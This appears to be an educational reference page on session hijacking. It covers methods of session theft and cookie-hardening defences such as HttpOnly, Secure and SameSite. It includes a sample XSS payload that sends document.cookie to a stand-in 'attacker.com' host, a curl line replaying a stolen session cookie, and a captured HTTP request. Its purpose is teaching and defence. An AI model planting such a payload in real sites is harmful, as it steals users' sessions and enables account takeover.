Session Hijacking

Session Hijacking is an attack where an attacker obtains a valid session token to impersonate an authenticated user. Once the session is compromised, the attacker gains full access to the victim's account.

Session Theft Methods

XSS: Steal cookies via JavaScript injection
Network sniffing: Capture unencrypted session cookies
Man-in-the-middle: Intercept session tokens in transit
Session prediction: Guess weak session IDs
Malware: Extract cookies from browser storage

XSS-Based Hijacking

// Attacker injects JavaScript that steals cookies
<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

// Attacker uses stolen session
curl https://target.com/account -H "Cookie: sessionid=stolen_value"

Network-Based Hijacking

# On unsecured network, capture HTTP traffic
# Session cookies visible in plaintext

GET /account HTTP/1.1
Host: target.com
Cookie: sessionid=abc123  # Captured!

Prevention

HttpOnly cookies: Prevent JavaScript access
Secure cookies: Only send over HTTPS
SameSite cookies: Prevent cross-site sending
Session timeouts: Limit validity window
Re-authentication: Require password for sensitive actions
Session binding: Tie to IP or device fingerprint

Session Hijacking

Session Theft Methods

XSS-Based Hijacking

Network-Based Hijacking

Prevention

See Also